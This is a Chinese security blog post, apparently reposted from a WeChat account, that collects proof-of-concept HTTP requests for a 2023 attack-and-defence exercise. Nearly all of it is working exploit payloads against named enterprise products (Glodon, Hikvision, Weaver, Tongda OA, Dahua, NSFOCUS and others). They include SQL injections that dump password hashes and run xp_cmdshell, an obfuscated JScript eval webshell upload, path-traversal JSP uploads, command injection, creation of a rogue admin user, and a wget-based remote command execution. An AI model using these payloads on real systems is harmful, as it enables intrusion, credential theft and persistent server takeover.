HW2023-POC收集整合

admin

104267
文章

87
评论

2023年8月11日15:24:56评论191 views字数 11079阅读36分55秒阅读模式

HW2023-POC收集整合

HWPOC来源互联网收集整合：

广联达sql注入漏洞

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: 11.11.11.11Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

广联达后台文件上传漏洞

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1Host: 11.11.11.11X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie: Connection: closeContent-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1112.jpg"Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("q1m1q1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--

HiKVISION 综合安防管理平台 files 任意文件上传漏洞

登陆页面

HW2023-POC收集整合

需要开放运行管理中心 (8001端口)

HW2023-POC收集整合

POST /center/api/files;.html HTTP/1.1Host: 11.11.11.11Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/1.jsp"Content-Type: application/zip
<%out.print("te1st3");%>
------WebKitFormBoundary9PggsiM755PLa54a--

HiKVISION 综合安防管理平台 report 任意文件上传漏洞

POST /svm/api/external/report HTTP/1.1Host: 11.11.11.11Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/ne1w.jsp"Content-Type: application/zip
1111111
------WebKitFormBoundary9PggsiM755PLa54a--
路径：/portal/ui/login/..;/..;/new.jsp

网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞

POST /?g=obj_app_upfile HTTP/1.1Host: 11.11.11.11Accept: */*Accept-Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"
10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="vulntest.php"Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"
obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--

马儿路径：attachements/xxx.php

网神 SecSSL 3600安全接入网关系统任意密码修改漏洞

POST /changepass.php?type=2 
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@

汉得SRM tomcat.jsp 登录绕过漏洞


/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1
然后访问后台：/main.screen

辰信景云终端安全管理系统 login SQL注入漏洞

POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

泛微E-Office9文件上传漏洞 CVE-2023-2523

POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 Host:11.11.11.11  Cache-Control:max-age=0  Upgrade-Insecure-Requests:1  Origin:null  Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  Accept-Encoding:gzip, deflateAccept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection:close
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition:form-data; name="upload_quwan"; filename="123.php."Content-Type:image/jpeg<?phpphpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

深信服应用交付系统命令执行漏洞

POST /rep/loginHost:10.10.10.1:85
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

通达OA sql注入漏洞 CVE-2023-4165

GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

通达OA sql注入漏洞 CVE-2023-4166

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

明御运维审计与风险控制系统堡垒机任意用户注册

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1Host: xxxCookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 1121
<?xml version="1.0"?><methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>XX.XX.XX.XX</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>deptadmin</string></value></member><member><name>name</name><value><string>deptadmin</string></value></member><member><name>pwd</name><value><string>Deptadmin@123</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name>email</name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>101</string></value></member></struct></value></param></params></methodCall>

泛微 E-Cology SQL注入漏洞

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip

callCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 AND 1=1c0-param1=string:1batchId=0

金和OA C6-GetSqlData.aspx SQL注入漏洞

POST /C6/Control/GetSqlData.aspx/.ashxHost: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip

exec master..xp_cmdshell 'ipconfig'

大华智慧园区综合管理平台 searchJson SQL注入漏洞

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close

大华智慧园区综合管理平台文件上传漏洞

POST /publishing/publishing/material/file/video HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 804Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close

--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="poc"

poc--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"

submit--dd8f988919484abab3816881c55272a7--

用友时空KSOA PayBill SQL注入漏洞

POST /servlet/PayBill?caculate&_rnd= HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 134Accept-Encoding: gzip, deflateConnection: close

<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
**命令执行**exec master..xp_cmdshell 'whoami';

绿盟 SAS堡垒机 GetFile 任意文件读取漏洞

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close

绿盟 SAS堡垒机 Exec 远程命令执行漏洞

GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close

欢迎添加微信进行业务咨询：

承接以下业务：

HW2023-POC收集整合

原文始发于微信公众号（网络安全交流圈）：HW2023-POC收集整合

左青龙
微信扫一扫

右白虎
微信扫一扫

HW2023-POC收集整合

某地HVV靠运气拿下权限全过程

hvv 前网安人必读的漏洞清单(2024年）

某次重要攻防演练细节打点到攻陷内网分享

攻防|社工钓鱼基本流程

记一次某地市小规模公司红队HW实战

Office文档钓鱼之如何快速进行宏免杀

溯源小技巧之蜜罐抓取的脱敏手机号的还原思路

记一次HW供应链攻击到SQL注入新用法

【红蓝/演练】-事前准备(8)之蜜罐建设

【2024HW】|6-攻防演练中一次渗透测试实例

发表评论

在线咨询

微信